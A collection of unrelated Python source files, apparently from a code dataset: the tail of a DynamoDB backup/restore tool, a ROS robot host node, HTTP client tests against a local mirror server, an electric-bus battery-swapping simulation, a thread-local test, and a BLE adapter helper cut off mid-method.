" table completed. Time taken: " + str(
datetime.datetime.now().replace(microsecond=0) - start_time))
else:
logging.info("Empty schema of " + source_table + " table created. Time taken: " +
str(datetime.datetime.now().replace(microsecond=0) - start_time))
def main():
"""
Entrypoint to the script
"""
global args, sleep_interval, start_time
# parse args
parser = argparse.ArgumentParser(description="Simple DynamoDB backup/restore/empty.")
parser.add_argument("-a", "--archive", help="Type of compressed archive to create."
"If unset, don't create archive", choices=["zip", "tar"])
parser.add_argument("-b", "--bucket", help="S3 bucket in which to store or retrieve backups."
"[must already exist]")
parser.add_argument("-m", "--mode", help="Operation to perform",
choices=["backup", "restore", "empty"])
parser.add_argument("-r", "--region", help="AWS region to use, e.g. 'us-west-1'. "
"Can use AWS_DEFAULT_REGION for local testing. Use '" +
LOCAL_REGION + "' for local DynamoDB testing")
parser.add_argument("--host", help="Host of local DynamoDB [required only for local]")
parser.add_argument("--port", help="Port of local DynamoDB [required only for local]")
parser.add_argument("--accessKey", help="Access key of local DynamoDB "
"[required only for local]")
parser.add_argument("--secretKey", help="Secret key of local DynamoDB "
"[required only for local]")
parser.add_argument("-p", "--profile",
help="AWS credentials file profile to use. Allows you to use a "
"profile instead accessKey, secretKey authentication")
parser.add_argument("-s", "--srcTable",
help="Source DynamoDB table name to backup or restore from, "
"use 'tablename*' for wildcard prefix selection or '*' for "
"all tables. Mutually exclusive with --tag")
parser.add_argument("-d", "--destTable",
help="Destination DynamoDB table name to backup or restore to, "
"use 'tablename*' for wildcard prefix selection "
"(defaults to use '-' separator) [optional, defaults to source]")
parser.add_argument("--prefixSeparator", help="Specify a different prefix separator, "
"e.g. '.' [optional]")
parser.add_argument("--noSeparator", action='store_true',
help="Overrides the use of a prefix separator for backup wildcard "
"searches [optional]")
parser.add_argument("--readCapacity",
help="Change the temp read capacity of the DynamoDB table to backup "
"from [optional]")
parser.add_argument("-t", "--tag", help="Tag to use for identifying tables to back up. "
"Mutually exclusive with srcTable. Provided as KEY=VALUE")
parser.add_argument("--writeCapacity",
help="Change the temp write capacity of the DynamoDB table to restore "
"to [defaults to " + str(RESTORE_WRITE_CAPACITY) + ", optional]")
parser.add_argument("--schemaOnly", action="store_true", default=False,
help="Backup or restore the schema only. Do not backup/restore data. "
"Can be used with both backup and restore modes. Cannot be used with "
"the --dataOnly [optional]")
parser.add_argument("--dataOnly", action="store_true", default=False,
help="Restore data only. Do not delete/recreate schema [optional for "
"restore]")
parser.add_argument("--skipThroughputUpdate", action="store_true", default=False,
help="Skip updating throughput values across tables [optional]")
parser.add_argument("--dumpPath", help="Directory to place and search for DynamoDB table "
"backups (defaults to use '" + str(DATA_DUMP) + "') [optional]",
default=str(DATA_DUMP))
parser.add_argument("--log", help="Logging level - DEBUG|INFO|WARNING|ERROR|CRITICAL "
"[optional]")
args = parser.parse_args()
# set log level
log_level = LOG_LEVEL
if args.log is not None:
log_level = args.log.upper()
logging.basicConfig(level=getattr(logging, log_level))
# Check to make sure that --dataOnly and --schemaOnly weren't simultaneously specified
if args.schemaOnly and args.dataOnly:
logging.info("Options --schemaOnly and --dataOnly are mutually exclusive.")
sys.exit(1)
# instantiate connection
if args.region == LOCAL_REGION:
conn = boto.dynamodb2.layer1.DynamoDBConnection(aws_access_key_id=args.accessKey,
aws_secret_access_key=args.secretKey,
host=args.host,
port=int(args.port),
is_secure=False)
sleep_interval = LOCAL_SLEEP_INTERVAL
else:
if not args.profile:
conn = boto.dynamodb2.connect_to_region(args.region, aws_access_key_id=args.accessKey,
aws_secret_access_key=args.secretKey)
sleep_interval = AWS_SLEEP_INTERVAL
else:
conn = boto.dynamodb2.connect_to_region(args.region, profile_name=args.profile)
sleep_interval = AWS_SLEEP_INTERVAL
# don't proceed if connection is not established
if not conn:
logging.info("Unable to establish connection with dynamodb")
sys.exit(1)
# set prefix separator
prefix_separator = DEFAULT_PREFIX_SEPARATOR
if args.prefixSeparator is not None:
prefix_separator = args.prefixSeparator
if args.noSeparator is True:
prefix_separator = None
# do backup/restore
start_time = datetime.datetime.now().replace(microsecond=0)
if args.mode == "backup":
matching_backup_tables = []
if args.tag:
            # Use Boto3 to find tables by tag. Boto3 provides a paginator that makes
            # searching tags easier.
matching_backup_tables = get_table_name_by_tag(args.profile, args.region, args.tag)
elif args.srcTable.find("*") != -1:
matching_backup_tables = get_table_name_matches(conn, args.srcTable, prefix_separator)
elif args.srcTable:
matching_backup_tables.append(args.srcTable)
if len(matching_backup_tables) == 0:
logging.info("No matching tables found. Nothing to do.")
sys.exit(0)
else:
logging.info("Found " + str(len(matching_backup_tables)) +
" table(s) in DynamoDB host to backup: " +
", ".join(matching_backup_tables))
        # Back up every matching table (single, wildcard or tag-based) via a queue of
        # worker threads; do_backup() pulls table names from the queue until it gets None.
        q = Queue()
        threads = []
        for i in range(MAX_NUMBER_BACKUP_WORKERS):
            t = threading.Thread(target=do_backup, args=(conn, args.readCapacity),
                                 kwargs={"tableQueue": q})
            t.start()
            threads.append(t)
            time.sleep(THREAD_START_DELAY)
        for table in matching_backup_tables:
            q.put(table)
        q.join()
        for i in range(MAX_NUMBER_BACKUP_WORKERS):
            q.put(None)
        for t in threads:
            t.join()
try:
logging.info("Backup of table(s) " + args.srcTable + " completed!")
except (NameError, TypeError):
logging.info("Backup of table(s) " +
", ".join(matching_backup_tables) + " completed!")
if args.archive:
if args.tag:
for table in matching_backup_tables:
dump_path = args.dumpPath + os.sep + table
did_archive, archive_file = do_archive(args.archive, dump_path)
if args.bucket and did_archive:
do_put_bucket_object(args.profile,
args.region,
args.bucket,
archive_file)
else:
did_archive, archive_file = do_archive(args.archive, args.dumpPath)
if args.bucket and did_archive:
do_put_bucket_object(args.profile, args.region, args.bucket, archive_file)
elif args.mode == "restore":
if args.destTable is not None:
dest_table = args.destTable
else:
dest_table = args.srcTable
# If backups are in S3 download and extract the backup to use during restoration
if args.bucket:
do_get_s3_archive(args.profile, args.region, args.bucket, args.srcTable, args.archive)
if dest_table.find("*") != -1:
matching_destination_tables = get_table_name_matches(conn, dest_table, prefix_separator)
delete_str = ": " if args.dataOnly else " to be deleted: "
logging.info(
"Found " + str(len(matching_destination_tables)) +
" table(s) in DynamoDB host" + delete_str +
", ".join(matching_destination_tables))
threads = []
for table in matching_destination_tables:
t = threading.Thread(target=delete_table, args=(conn, sleep_interval, table))
threads.append(t)
t.start()
time.sleep(THREAD_START_DELAY)
for thread in threads:
thread.join()
matching_restore_tables = get_restore_table_matches(args.srcTable, prefix_separator)
logging.info(
"Found " + str(len(matching_restore_tables)) +
" table(s) in " + args.dumpPath + " to restore: " + ", ".join(
matching_restore_tables))
threads = []
for source_table in matching_restore_tables:
if args.srcTable == "*":
t = threading.Thread(target=do_restore,
args=(conn,
sleep_interval,
source_table,
source_table,
args.writeCapacity))
else:
t = threading.Thread(target=do_restore,
args=(conn, sleep_interval, source_table,
change_prefix(source_table,
args.srcTable,
dest_table,
prefix_separator),
args.writeCapacity))
threads.append(t)
t.start()
time.sleep(THREAD_START_DELAY)
for thread in threads:
thread.join()
logging.info("Restore of table(s) " + args.srcTable + " to " +
dest_table + " completed!")
else:
delete_table(conn, sleep_interval, dest_table)
do_restore(conn, sleep_interval, args.srcTable, dest_table, args.writeCapacity)
elif args.mode == "empty":
if args.srcTable.find("*") != -1:
matching_backup_tables = get_table_name_matches(conn, args.srcTable, prefix_separator)
logging.info("Found " + str(len(matching_backup_tables)) +
" table(s) in DynamoDB host to empty: " +
", ".join(matching_backup_tables))
threads = []
for table in matching_backup_tables:
t = threading.Thread(target=do_empty, args=(conn, table))
threads.append(t)
t.start()
time.sleep(THREAD_START_DELAY)
for thread in threads:
thread.join()
logging.info("Empty of table(s) " + args.srcTable + " completed!")
else:
do_empty(conn, args.srcTable)
if __name__ == "__main__":
main()
|
robot_host.py
|
#!/usr/bin/python3
import math
import rospy
import rostopic
import rosnode
import copy
import threading
from geometry_msgs.msg import PoseStamped
from nics_robot_host.srv import *
from rospy.core import rospyinfo
class RobotHost(object):
def __init__(self, args, env):
# get agent number from env
self.agent_num = len(env.world.vehicle_list)
# init host node
rospy.init_node("robot_host")
# TODO get this param from launch file
self.core_fps = 10
# check the number of agent client
All_ready = False
while not All_ready:
node_name_list:list[str] = rosnode.get_node_names()
self.vehicle_id_list = []
for node_name in node_name_list:
if node_name.endswith('robot_client'):
                    # assume all robot_client nodes are named as '/XXXX/vehicle_id/robot_client'
self.vehicle_id_list.append(node_name.split('/')[-2])
if len(self.vehicle_id_list) == self.agent_num:
All_ready = True
break
print(self.vehicle_id_list)
rospy.sleep(0.5)
#build observation services
self.obs_server_list = []
for vehicle_id in self.vehicle_id_list:
obs_messenger = rospy.Service(name='/'+vehicle_id+'/get_obs',
service_class=obs,
handler= (lambda a:lambda msg: self.obs_calculate(msg, a))(vehicle_id,))
self.obs_server_list.append(obs_messenger)
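        # The nested lambda above is the usual trick for binding the loop's current
        # vehicle_id: a plain "lambda msg: self.obs_calculate(msg, vehicle_id)" would
        # late-bind and every handler would end up using the last id. A minimal sketch
        # of the same idea outside ROS:
        #   handlers = [(lambda a: lambda msg: (a, msg))(i) for i in range(3)]
        #   handlers[0]("hi")  # -> (0, "hi")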
# update the agent data_interface
self.env = env
new_interface = {}
for vehicle_idx in range(self.agent_num):
vehicle_id = self.vehicle_id_list[vehicle_idx]
vehicle = self.env.world.vehicle_list[vehicle_idx]
old_id = vehicle.vehicle_id
vehicle.vehicle_id = vehicle_id
new_interface[vehicle_id] = self.env.world.data_interface.pop(old_id)
self.env.world.data_interface = new_interface
# waiting for all topic
self.ros_data_interface = {}
for vehicle_id in self.vehicle_id_list:
ros_data = {}
for data_name in ['pose','scan']:
ros_data[data_name] = False
self.ros_data_interface[vehicle_id] = ros_data
print(ros_data)
        # check that all expected topics are ready
        rospyinfo('checking that all expected topics are ready')
all_data_interface_ready = False
while not all_data_interface_ready:
all_data_interface_ready = True
for v_id, inter in self.ros_data_interface.items():
for data_name,state in inter.items():
if state is False:
print('/'+v_id+'/'+ data_name + ' is not found')
all_data_interface_ready = False
topic_list = rospy.get_published_topics()
for topic in topic_list:
topic_name:str = topic[0]
topic_name_split = topic_name.split('/')
v_id = topic_name_split[1]
if v_id in self.ros_data_interface.keys():
data_name = topic_name_split[2]
if data_name in self.ros_data_interface[v_id]:
self.ros_data_interface[v_id][data_name] = True
rospy.sleep(1.0)
self.ros_data_interface_sub = []
#subscribe all ros data interface
for vehicle_id in self.vehicle_id_list:
for data_name in self.ros_data_interface[vehicle_id].keys():
# handle = lambda msg: store_data_2(msg, self.ros_data_interface, vehicle_id, data_name)
topic_name = '/'+vehicle_id+'/'+data_name
data_class = rostopic.get_topic_class(topic_name)[0]
sub = rospy.Subscriber(name = '/'+vehicle_id+'/'+data_name,
data_class=data_class,
callback=self.store_data,
callback_args=(vehicle_id, data_name))
self.ros_data_interface_sub.append(sub)
for sub in self.ros_data_interface_sub:
print('sub_name',sub.name)
#check for all client control services
self.client_ctrl_srv = []
for vehicle_id in self.vehicle_id_list:
client_ctrl_name = '/'+vehicle_id+'/client_control'
rospy.wait_for_service(client_ctrl_name)
self.client_ctrl_srv.append(rospy.ServiceProxy(client_ctrl_name,sup))
self.ros_spin_thread = threading.Thread(target=rospy.spin)
self.ros_spin_thread.setDaemon(True)
self.ros_spin_thread.start()
state_flag = 'wait for pos'
while True:
cmd = input('state is %s, waiting for cmd '%state_flag)
if state_flag == 'wait for pos':
if cmd == 'pos':
self.env.reset()
while True:
result = self.waiting_for_vehicle()
if result is True:
                            rospy.loginfo('all agents are ready')
break
else:
rospy.loginfo(result)
rospy.sleep(0.1)
state_flag = 'wait for start'
rospy.loginfo('pos mode reset')
if cmd == 'random':
self.env.reset()
for agent in self.env.world.vehicle_list:
ros_data_interface = self.ros_data_interface[agent.vehicle_id]
agent.state.coordinate[0] = ros_data_interface['pose'].twist.linear.x
agent.state.coordinate[1] = ros_data_interface['pose'].twist.linear.y
agent.state.theta = ros_data_interface['pose'].twist.angular.z
state_flag = 'wait for start'
rospy.loginfo('random mode reset')
if cmd == 'start' and state_flag == 'wait for start':
state_flag = 'start'
rospy.loginfo('start!')
self.core_thread = threading.Thread(target=self.core_function)
self.core_thread.setDaemon(True)
self.core_thread.start()
for idx in range(len(self.vehicle_id_list)):
sup_arg = supRequest()
sup_arg.start = True
sup_arg.movable = True
sup_arg.collision = False
self.client_ctrl_srv[idx](sup_arg)
if cmd == 'exit':
rospy.signal_shutdown('exit')
break
def waiting_for_vehicle(self):
def near_enough(x, y, yaw, x_t, y_t, yaw_t):
            # not near enough if the agent is more than 0.01 m away from its reset position
            if ((x - x_t)**2 + (y - y_t)**2)**0.5 > 0.01:
                return False
            # not near enough if the yaw differs from the target by more than 5 degrees
            sin_con = math.sin(abs(yaw - yaw_t)) < math.sin(5 / 180 * math.pi)
            cos_con = math.cos(abs(yaw - yaw_t)) > math.cos(5 / 180 * math.pi)
            if not (sin_con and cos_con):
                return False
return True
for agent in self.env.world.vehicle_list:
ros_data_interface = self.ros_data_interface[agent.vehicle_id]
x_t = agent.state.coordinate[0]
y_t = agent.state.coordinate[1]
yaw_t = agent.state.theta
x = ros_data_interface['pose'].twist.linear.x
y = ros_data_interface['pose'].twist.linear.y
yaw = ros_data_interface['pose'].twist.angular.z
if not near_enough(x,y,yaw,x_t,y_t,yaw_t):
info_str = "%s pos is (%f, %f, %f) but (%f, %f, %f) is required" %(agent.vehicle_id, x,y,yaw, x_t,y_t,yaw_t)
return info_str
return True
def store_data(self, msg, args):
v_id = args[0]
data_name = args[1]
self.ros_data_interface[v_id][data_name] = copy.deepcopy(msg)
def obs_calculate(self,req,vehicle_id):
rospy.loginfo("Calculate obs for car %s",vehicle_id)
car_index = self.vehicle_id_list.index(vehicle_id)
agent = self.env.world.vehicle_list[car_index]
obs_result = self.env._get_obs(agent)
return obsResponse(obs_result)
def core_function(self):
self.start_time = rospy.get_time()
rate = rospy.Rate(self.core_fps)
        while not rospy.is_shutdown():
old_movable_list = copy.deepcopy([v.state.movable for v in self.env.world.vehicle_list])
total_time = rospy.get_time() - self.start_time
self._update_data_interface()
self.env.ros_step(total_time)
for v_idx in range(self.agent_num):
v = self.env.world.vehicle_list[v_idx]
if not(v.state.movable == old_movable_list[v_idx]):
sup_arg = supRequest()
sup_arg.start = True
sup_arg.movable = v.state.movable
sup_arg.collision = v.state.crashed
self.client_ctrl_srv[v_idx](sup_arg)
rate.sleep()
def _update_data_interface(self):
for vehicle_idx in range(self.agent_num):
vehicle_id = self.vehicle_id_list[vehicle_idx]
data_interface = self.env.world.data_interface[vehicle_id]
ros_data_interface = self.ros_data_interface[vehicle_id]
data_interface['x'] = ros_data_interface['pose'].twist.linear.x
data_interface['y'] = ros_data_interface['pose'].twist.linear.y
data_interface['theta'] = ros_data_interface['pose'].twist.angular.z
data_interface['lidar'] = ros_data_interface['scan'].ranges
|
test_exchange.py
|
import unittest
from multiprocessing import Process
import requests
import json
import time
from ..exchange import Exchange
from ..config import DefaultConfig
from ..auth import Auth
from ..error import TimeoutError,ResponseError
from grabbag.list import first_not_none
from grabbag.dict import merge
TEST_METHODS = ('GET','POST','PUT','DELETE')
TEST_DATAS = ('','{"json":true}','<html></html>')
TEST_PARAMS = ({'a':'1'},{'a':'z'},{},{'c':'3'})
TEST_HEADERS = ({'a':'1'},{'a':'z'},{},{'c':'3'})
class TestAuth(Auth): pass
class TestExchange(Exchange):
protocol = 'http'
domain = 'localhost:8087'
base_path = '/blah/v1'
sub_path = 'mirror/create'
def process_response(self, response): return json.loads(response.content)
class TestExchange2(Exchange): pass
def webserver():
from bottle import route, run, request, error
@route('/blah/v1/mirror/:extra', method='GET')
def get(extra): return mirror(extra)
@route('/blah/v1/mirror/:extra', method='POST')
def post(extra): return mirror(extra)
@route('/blah/v1/mirror/:extra', method='PUT')
def putextra(extra): return mirror(extra)
@route('/blah/v1/mirror/:extra', method='DELETE')
def delete(extra): return mirror(extra)
@error(404)
def bad(code): return 'bad'
@route('/sleep/:ms', method='GET')
def sleep(ms):
time.sleep(int(ms)/1000.0)
return json.dumps( {'sleep': ms} )
def mirror(extra):
return json.dumps( dict(
method = request.method,
protocol = request.urlparts[0],
domain = request.urlparts[1],
path = request.urlparts[2],
body = request.body.getvalue(),
params = dict((k,request.query.getall(k)) for k in request.query.keys()),
headers = dict((k,request.headers.get(k)) for k in request.headers.keys())))
run(host='localhost', port=8087)
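# The mirror routes above echo the request back as JSON, roughly (a sketch):
#   GET http://localhost:8087/blah/v1/mirror/create?a=1
#   -> {"method": "GET", "protocol": "http", "domain": "localhost:8087",
#       "path": "/blah/v1/mirror/create", "body": "", "params": {"a": ["1"]},
#       "headers": {...}}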
class ExchangeTest(unittest.TestCase):
@classmethod
def setUpClass(kls):
kls.webserver_process = Process(target=webserver)
kls.webserver_process.start()
working = False
while not working:
time.sleep(0.02)
try:
working = requests.get('http://localhost:8087/blah/v1/mirror/whatever').status_code == 200
except: pass
@classmethod
def tearDownClass(kls):
kls.webserver_process.terminate()
kls.webserver_process.join()
def setUp(self): pass
def tearDown(self): pass
def _test_expected_attr(self, attr, possibles, default=None, add_none=True, final_possibles=None):
final_possibles = list(final_possibles or possibles)
if add_none:
possibles = [None] + list(possibles)
final_possibles = [None] + list(final_possibles)
for k,x in zip(possibles,final_possibles):
for l in (True, False):
for m,z in zip(possibles,final_possibles):
for n,w in zip(possibles, final_possibles):
class TestExchangeX(TestExchange2): pass
if l:
if k is not None: setattr(TestExchangeX, attr, k)
else:
if k is not None: setattr(TestExchangeX, attr, lambda self: k)
auth = Auth()
if n is not None: setattr(auth,attr,n)
self.assertEquals(default if n is None else n, getattr(auth,attr,None))
ex = TestExchangeX(auth, **{attr:m})
self.assertEquals(first_not_none( (z,x,w), default), getattr(ex, attr))
def _test_additive_attr(self, attr, possibles, add_none=True):
if add_none:
possibles = [None] + list(possibles)
for k in possibles:
for l in (True,False):
for m in possibles:
for n in possibles:
class TestExchangeX(TestExchange): pass
auth = Auth()
setattr(auth,attr,n)
if l:
if k is not None: setattr(TestExchangeX, attr, k)
else:
if k is not None: setattr(TestExchangeX, attr, lambda self: k)
ex = TestExchangeX(auth, **{attr:m})
self.assertEquals( merge({}, n or {}, k or {}, m or {}), getattr(ex, attr))
def test_calcs(self):
self._test_expected_attr('method', TEST_METHODS, DefaultConfig.method)
self._test_expected_attr('protocol', ('http','https'), DefaultConfig.protocol)
self._test_expected_attr('domain', ('app.localhost','app.hubspotqa.com','app.hubspot.com'), add_none=False)
self._test_expected_attr('base_path', ('/v1/whatever/','/base/path','') , None, final_possibles=('v1/whatever','base/path',None))
self._test_expected_attr('sub_path', ('/create','','show/'), None, final_possibles=('create',None,'show'))
self._test_expected_attr('data', TEST_DATAS)
self._test_expected_attr('timeout', (10,20,30), DefaultConfig.timeout)
self._test_expected_attr('max_retries', (0,1,2), DefaultConfig.max_retries)
###TODO: make it possible to use params as they can be used (i.e. multiple values per key -- i.e. MultiDict)
self._test_additive_attr('params', TEST_PARAMS)
self._test_additive_attr('headers', TEST_HEADERS)
def test_timeouts(self):
self.assertTrue(TestExchange(TestAuth(), timeout=0.5).result)
with self.assertRaises(TimeoutError):
self.assertTrue(TestExchange(TestAuth(), timeout=0.00001).result)
def test_methods(self):
for method in TEST_METHODS:
self.assertEquals(method, TestExchange(TestAuth(), method=method).result['method'])
def test_datas(self):
for data in TEST_DATAS:
self.assertEquals(data, TestExchange(TestAuth(), data=data).result['body'])
def test_sub_paths(self):
for sub_path in ('create','show','list'):
self.assertEquals("/blah/v1/mirror/%s"%sub_path, TestExchange(TestAuth(), base_path='blah/v1/mirror', sub_path=sub_path).result['path'])
def test_params(self):
for params in TEST_PARAMS:
self.assertEquals(dict((k,[v]) for k,v in params.iteritems()), TestExchange(TestAuth(), params=params).result['params'])
def test_headers(self):
for headers in TEST_HEADERS:
self.assertEquals(dict((k.upper(),v) for k,v in headers.iteritems()), dict((k.upper(),v) for k,v in TestExchange(TestAuth(), headers=headers).result['headers'].iteritems() if k.lower() in headers.keys()))
def test_max_retries(self):
for max_retries in (0,1,2):
try:
self.assertTrue(TestExchange(TestAuth(), timeout=0.00001, max_retries=max_retries).result)
except TimeoutError as err:
self.assertEquals(max_retries+1, len(err.exchange.failures))
for f in err.exchange.failures:
self.assertTrue(isinstance(f, TimeoutError))
continue
except:
self.fail("should not get to here")
self.fail("should not get to here")
def test_bulk_exchange(self):
count = 5
for async in (True,False):
exs = [TestExchange(TestAuth(), params={'i':str(i), 'async':str(async)}) for i in xrange(count)]
for ex,i in zip(Exchange.async_exchange(exs), xrange(count)):
self.assertEquals([str(i)],ex.result['params']['i'])
self.assertEquals([str(async)],ex.result['params']['async'])
def test_different_auth(self):
class TestAuth1(Auth):
def params(self): return {'key1':'value1'}
class TestAuth2(Auth):
def params(self): return {'key2':'value2'}
class TestExchange1(Exchange): pass
class TestExchange2(Exchange): pass
self.assertEquals({'key1':'value1'},TestExchange1(TestAuth1()).params)
self.assertEquals({'key2':'value2'},TestExchange1(TestAuth2()).params)
def test_bad_url(self):
class TestExchange(Exchange):
protocol = 'http'
domain = 'localhost:8087'
base_path = 'bad'
ok404 = True
def process_error(self, error, response):
if response is not None:
if response.status_code==404:
return self.ok404
return False
def process_response(self, response): return response.text
self.assertEquals('bad',TestExchange(TestAuth()).result)
TestExchange.ok404=False
with self.assertRaises(ResponseError):
self.assertTrue(TestExchange(TestAuth()).result)
|
timeToSaturation.py
|
from simulationClasses import DCChargingStations, Taxi, Bus, BatterySwappingStation
import numpy as np
import pandas as pd
from scipy import stats, integrate
import matplotlib.pyplot as plt
from matplotlib.ticker import FuncFormatter
from matplotlib.dates import DateFormatter, HourLocator, MinuteLocator, AutoDateLocator
import seaborn as sns
import csv
import sys
from datetime import datetime,date,timedelta
import random
from math import ceil
import math
import multiprocessing
def simulateBusDCChargingStationIncome(numberOfDCCharger, numberOfBuses, movingSpeed):
chargerCost = 15000*numberOfDCCharger
    chargerCost = 0  # NOTE: capital cost zeroed out, so the returned charger income ignores it
busChargingStation = DCChargingStations(numberOfDCCharger)
busFleet = []
for i in range(numberOfBuses):
newBus = Bus()
newBus.useSwapping = 0
newBus.normalSpeed = movingSpeed
busFleet.append(newBus)
time = 0
busIncome = []
busChargerIncome = []
while time < 24 * 60 * 30:
todayBusIncome = 0
tempBusFleet = []
for runningBus in busFleet:
runningBus.decideChargeMode(time)
if runningBus.chargingMode == 1:
busChargingStation.addCharge(runningBus)
else:
runningBus.getTravelSpeed(time)
tempBusFleet.append(runningBus)
busFleet = tempBusFleet
tempChargingVehicles = []
for chargingBus in busChargingStation.chargingVehicles:
chargingBus.decideChargeMode(time)
if chargingBus.chargingMode == 0:
chargingBus.getTravelSpeed(time)
busFleet.append(chargingBus)
else:
chargingBus.charge(time, 0, busChargingStation.chargeSpeed)
tempChargingVehicles.append(chargingBus)
busChargingStation.chargingVehicles = tempChargingVehicles
while busChargingStation.numberOfStations - len(busChargingStation.chargingVehicles) > 0:
if len(busChargingStation.pendingVehicles) > 0:
newChargeBus = busChargingStation.pendingVehicles.pop(0)
newChargeBus.charge(time, 0, busChargingStation.chargeSpeed)
busChargingStation.chargingVehicles.append(newChargeBus)
else:
break
busChargingStation.charge()
for bus in busFleet + busChargingStation.chargingVehicles + busChargingStation.pendingVehicles:
todayBusIncome += bus.income
busIncome.append([time, todayBusIncome, len(busFleet), len(busChargingStation.chargingVehicles),
len(busChargingStation.pendingVehicles)])
busChargerIncome.append([time, busChargingStation.income])
time += 1
return busIncome[-1][1]*6,busChargerIncome[-1][1]*6-chargerCost
def simulateBusSwapperIncome(numberOfSlot, numberOfBuses, busSpeed):
swapperInitCost = 2.5*(10**6)
swapperSlotCost = 5000 * (numberOfSlot-1)
totalSwapperCost = swapperInitCost+swapperSlotCost
    totalSwapperCost = 0  # NOTE: capital cost zeroed out, so the returned swapper income ignores it
busSwappingStation = BatterySwappingStation(numberOfSlot, 324)
busFleet = []
for i in range(numberOfBuses):
newBus = Bus()
newBus.useSwapping = 1
newBus.normalSpeed = busSpeed
busFleet.append(newBus)
time = 0
busIncome = []
busSwapperIncome = []
while time < 24 * 60 * 30:
todayBusIncome = 0
tempBusFleet = []
for runningBus in busFleet:
runningBus.decideChargeMode(time)
if runningBus.chargingMode == 1:
result = busSwappingStation.addVehicle(runningBus)
if result > 0:
runningBus.charge(time, result, 0)
busSwappingStation.swappingVehicles.append(runningBus)
else:
runningBus.getTravelSpeed(time)
tempBusFleet.append(runningBus)
busFleet = tempBusFleet
tempSwappingVehicles = []
for swappingBus in busSwappingStation.swappingVehicles:
swappingBus.charge(time, 0, 0)
if swappingBus.chargingMode == 0:
swappingBus.getTravelSpeed(time)
busFleet.append(swappingBus)
else:
tempSwappingVehicles.append(swappingBus)
busSwappingStation.swappingVehicles = tempSwappingVehicles
while len(busSwappingStation.pendingVehicles) > 0:
if len(busSwappingStation.swappingVehicles) < busSwappingStation.numberOfSlot:
newBus = busSwappingStation.pendingVehicles.pop(0)
result = busSwappingStation.swap(newBus.remainingBatterykWh)
newBus.charge(time, result, 0)
busSwappingStation.swappingVehicles.append(newBus)
else:
break
for bus in busFleet + busSwappingStation.swappingVehicles + busSwappingStation.pendingVehicles:
todayBusIncome += bus.income
busIncome.append([time, todayBusIncome, len(busFleet), len(busSwappingStation.swappingVehicles),
len(busSwappingStation.pendingVehicles), \
len(busFleet) + len(busSwappingStation.swappingVehicles) + len(
busSwappingStation.pendingVehicles)])
busSwapperIncome.append([time, busSwappingStation.income])
time += 1
return busIncome[-1][1]*6,busSwapperIncome[-1][1]*6-totalSwapperCost
def iterate(iteration):
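    # For each bus cruising speed i, grow the fleet size j until the swapping
    # station's income changes by less than 0.5% from the previous fleet size,
    # i.e. the station has saturated, and record that j per speed. The simulate*
    # helpers above return 30-day incomes scaled by 6 (roughly half a year).
    # The commented-out block performs the same search for the DC-charging case.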
taxiChargerIncome = []
busChargerIncome = []
taxiSwappingIncome = []
busSwappingIncome = []
taxiDCChargerIncome = []
taxiSwapperIncome = []
busDCChargerIncome = []
busSwapperIncome = []
j_previous_charge = 50
j_previous_swap = 200
for i in range(10,45,1):
# previousBusCharger = 0.001
# for j in range(j_previous_charge - 25, j_previous_charge+67, 1):
# thisBusCharger, thisBusDCCharger = simulateBusDCChargingStationIncome(24, j, i)
# if abs(thisBusCharger - previousBusCharger)/previousBusCharger < 0.005:
# break
# else:
# previousBusCharger = thisBusCharger
# j_previous_charge = j
# busChargerIncome.append([i, j])
# busDCChargerIncome.append([i, j])
previousBusSwapper = 0.001
for j in range(j_previous_swap - 20, j_previous_swap + 67, 1):
thisBusSwap, thisBusSwapper = simulateBusSwapperIncome(2, j, i)
print(thisBusSwap)
if abs(thisBusSwapper - previousBusSwapper)/previousBusSwapper < 0.005:
break
else:
previousBusSwapper = thisBusSwapper
j_previous_swap = j
busSwappingIncome.append([i, j])
busSwapperIncome.append([i, j])
# busChargerIncomeDataFrame = pd.DataFrame(busChargerIncome,columns=["number","income"])
busSwappingIncomeDataFrame = pd.DataFrame(busSwappingIncome,columns=["number","income"])
# busDCChargerIncomeDataFrame = pd.DataFrame(busDCChargerIncome,columns=["number","income"])
busSwapperIncomeDataFrame = pd.DataFrame(busSwapperIncome,columns=["number","income"])
# busChargerIncomeDataFrame.to_pickle("busChargerIncomeDataFrame"+str(iteration)+".pkl")
busSwappingIncomeDataFrame.to_pickle("busSwappingIncomeDataFrame"+str(iteration)+".pkl")
# busDCChargerIncomeDataFrame.to_pickle("busDCChargerIncomeDataFrame"+str(iteration)+".pkl")
busSwapperIncomeDataFrame.to_pickle("busSwapperIncomeDataFrame"+str(iteration)+".pkl")
if __name__ == '__main__':
    # Guard process spawning so the module stays importable (required for the
    # 'spawn' start method used on some platforms).
    for i in range(30):
        p = multiprocessing.Process(target=iterate, args=(i,))
        p.start()
|
testLocal.py
|
# -*- coding:utf-8 -*-
import unittest
import time
from threading import Thread
from tindo import Local
class TestLocal(unittest.TestCase):
def testSingle(self):
local = Local()
local.name = 'gaofeng'
local.age = 12
self.assertEqual(local.name, 'gaofeng')
self.assertEqual(local.age, 12)
del local.name
with self.assertRaises(AttributeError):
local.name
def modify(self, ctx):
time.sleep(1)
ctx.name = 'subThread'
def testMultiThread(self):
ctx = Local()
ctx.name = 'main'
t = Thread(target=self.modify, args=(ctx,))
t.start()
t.join()
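    # The worker thread set ctx.name on its own thread-local storage, so the
    # value observed here in the main thread is unchanged.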
self.assertEqual(ctx.name, 'main')
if __name__ == '__main__':
unittest.main()
|
test-ble-adapter.py
|
#!/usr/bin/python
# coding:utf-8
# Need pygatt tool for BLE communication:
# https://github.com/peplin/pygatt
import time
import pygatt
import threading
from pygatt import BLEDevice
class BLEAdapter:
def __init__(self):
self.remote_devices_type = pygatt.BLEAddressType.random
self.adapter = pygatt.GATTToolBackend()
self.adapter.start()
self.remote_devices = ""
def scan_remote_devices(self):
self.remote_devices = self.adapter.scan()
return self.remote_devices
def _scan_device(self, remote_devices, device_name):
for i in range(len(remote_devices)):
for key, value in remote_devices[i].items():
if value == device_name:
remote_device = remote_devices[i]
device_address = remote_device.get("address")
return device_address
def get_device_address(self, device_name):
if self.remote_devices == "":
self.scan_remote_devices()
device_address = self._scan_device(self.remote_devices, device_name)
return device_address
def connect_device(self, address):
device_con = self.adapter.connect(address, address_type = self.remote_devices_type)
return device_con
class RemoteBLEDevice:
def __init__(self, con_device):
self.con_device = con_device
self.characteristics = self.con_device.discover_characteristics()
def get_uuid_and_handle(self, uuid_short):
for key, value in self.characteristics.items():
if uuid_short in value.uuid:
char_uuid_full = value.uuid
char_handle = value.handle
return char_uuid_full, char_handle
def read_value(self, uuid_full):
value = (self.con_device.char_read(uuid_full)).decode("utf-8")
return value
def write_value(self, handle, value):
